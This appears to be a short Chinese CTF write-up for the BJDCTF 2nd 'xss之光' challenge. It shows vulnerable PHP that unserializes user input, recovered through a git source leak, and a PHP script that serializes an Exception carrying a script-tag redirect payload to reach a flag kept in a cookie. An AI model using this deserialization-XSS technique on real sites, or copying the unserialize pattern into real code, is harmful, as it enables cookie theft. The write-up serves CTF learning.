[BJDCTF 2nd]xss之光

1.git源码泄露

用githack提取源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

2.构造序列化脚本

题目是XSS,构造一个XSS跳转脚本,
在这里插入图片描述在这里插入图片描述通过参数传入,flag在cookie里

代码中没有给出类来,所以我们只能使用PHP的原生类来序列化构造XSS,具体文章可以看:http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/这里我们用了Exception()原生类,进行了XSS跳转拿到了flag
php脚本:

<?php
$a = serialize(new Exception("<script>window.location.href='baidu.com'</script>"));
echo urlencode($a);
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值